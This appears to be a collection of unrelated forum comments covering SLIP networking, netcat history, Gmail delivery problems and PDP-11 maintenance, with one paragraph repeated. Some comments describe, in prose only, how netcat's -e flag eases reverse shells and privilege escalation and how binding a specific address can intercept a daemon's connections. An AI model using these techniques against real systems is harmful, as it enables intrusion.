I love that the networking stack uses SLIP and slattach(1)!
I was playing with a toy TCP/IP stack, and decided using SLIP over a pty on Linux was a great way to interface with the kernel. Unfortunately it looks like macOS previously shipped with slattach(1) a very long time ago, but no longer does.
I'm curios if other people have used SLIP on macOS to get a dead-simple, cross-platform API to the networking stack?
The alternative would be to use tun/tap on Linux and utun on macOS, but SLIP would be so much nicer.
Another option is to use the p5.js library. They also have a nice online editor, at https://editor.p5js.org/, which makes it easy for students to get up and running quickly.
Very interesting telnet site, thank you for sharing!
FYI, though, I think this may be looking at the wrong object ID.
It selected "31", which appears to be the entry for one of the Lagrange points. Voyager 1 and 2 appear to have negative ID numbers, "-31" and "-32".
I have a domain I've been using for some 20 years as my primary email address. There are some gmail users I can send mail to without any problems at all. For other gmail users, my messages appear to go into a black hole, not even showing up in their spam folder. Looking at my postfix logs, I can see gmail's SMTP servers don't report any problems at delivery time. It's frustrating.
The post does a poor job explaining it, but the term "gaping security hole" comes from traditional netcat's source code. In order to enable the "-e" (exec) flag, it must be compiled with "-DGAPING_SECURITY_HOLE".
I believe the reason they are called "gaping security holes" is that if nc is installed as setuid root, they allow local privilege escalation (see https://serverfault.com/questions/237584/netcat-e-the-gaping..., https://nc110.sourceforge.io/). Another explanation is that they make it trivial to create reverse shells etc. (though it is still possible to create reverse shells without -e/-c, for example using named pipes).
Leaving aside whether or not they should want to post it there, I'm surprised it has an audience.
Someone saw it and shared it to HN; enough read it to upvote it this much.. maybe Facebook's more popular than I thought! (That sounds silly or sarcastic, but 'among HN users and similar' I'm serious.)
> A “crash” is an unscheduled system reboot or halt. There is about one crash every other day; about two-thirds of them are caused by hardware-related difficulties such as power dips and inexplicable processor interrupts to random locations.
The bigger ones definitely required decent periodic maintenance. Typically you'd contract DEC or a third party to come out semi-annually to vacuum things out, apply field fixes (yes, run wires on boards and the backplane), and run hardware diagnostics.
There were a lot of wire-wrap connections on those things. If they had been done right you were good. Done wrong, and your system was haunted until someone found the loose wire. We had an 11/45 with a flaky Unibus bay that could be "fixed" with a little percussive ablation. Finally got DEC to get serious about the problem, and they spent several days tracking down a bad socket.
I don't miss wire wrap. At all.
We have it good these days. Rack a bunch of servers, run them hard for years with only DIMM replacements or maybe the odd SSD, and recycle them once the bathtub failures start edging up. I don't want to think about the comparable compute power; my wristwatch runs rings around that 11/45. We live in the future.
At least one RSTS/E release amusingly came with patch notes that included wire wrap instructions. I distinctly remember a great deal of grumbling when the patch caused issues and the downgrade included undoing the wire wrap patches. If you thought sharing your screen and coding or debugging was high pressure, imagine pulling out one of the drawers holding your computer's guts and dealing with this while a room full of people hovered over your shoulder. https://upload.wikimedia.org/wikipedia/commons/a/ae/PDP-11-3...
I guess it's a matter of perspective. By the standards of the decade before that, a computer which could run for 2 - 3 days reliably without hardware glitches would have been remarkably reliable. For such a machine to sell for under $100,000 would have been stunning.
The reliability we think of with modern computers is, I think, mostly a consequence of very high integration. Few solder joints to go wrong.
The PDP-6 predates the integrated circuits of the PDP-11 models, and had a board as part of the ALU path that almost always blew at least one of the 36 boards (one for each bit in the machine word) on a power cycle.
The README that Hobbit (author of the original netcat) wrote is a really good read. I learned a lot when I first read it years and years ago.
I especially remember it describing how it is possible to get "in front" of another daemon.
If the daemon has bound a listening socket to 0.0.0.0, as most do, you can bind to a more specific address on the same port and intercept inbound connections. Fun!
I was playing with a toy TCP/IP stack, and decided using SLIP over a pty on Linux was a great way to interface with the kernel. Unfortunately it looks like macOS previously shipped with slattach(1) a very long time ago, but no longer does.
I'm curios if other people have used SLIP on macOS to get a dead-simple, cross-platform API to the networking stack?
The alternative would be to use tun/tap on Linux and utun on macOS, but SLIP would be so much nicer.